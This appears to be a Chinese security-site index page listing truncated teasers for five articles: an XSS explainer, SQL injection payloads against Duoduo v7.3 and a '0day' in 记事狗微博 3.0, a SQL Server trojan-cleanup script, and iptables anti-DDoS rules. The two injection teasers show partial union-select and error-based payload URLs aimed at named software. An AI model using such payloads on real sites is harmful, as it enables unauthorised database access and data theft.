-
PHP安全之XSS攻击
(一)概念说明Xss(cross-site scripting)攻击指的是攻击者往Web页面里插入恶意html标签或者javascript代码,当用户浏览该页或者进行某些操作时,攻击者利用用户对原网站的信任,诱骗用户或浏览器执行一些不安全的...
-
多多返利淘宝客程序Duoduo v7.3注入漏洞
简要描述: http://demo.duoduo123.com/huangou.php?id=-1%20union%20select%201,2,3,group_concat%28table_name%29,5,6,7,8%20from%2...
-
记事狗微博3.0 0day
你懂的。。。 wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20conc...
-
SQL Server 清除木马
drop table tedrop function dbo.mdSQL select a.name as Cname,b.name as tbname into te from syscolumns a,sysobjects b,syst...
-
IPTABLE 减轻 DDOS 的设定
# Make sure NEW tcp connections are SYN packetsiptables -N syn-floodiptables -A INPUT -p tcp --syn -j syn-floodiptables...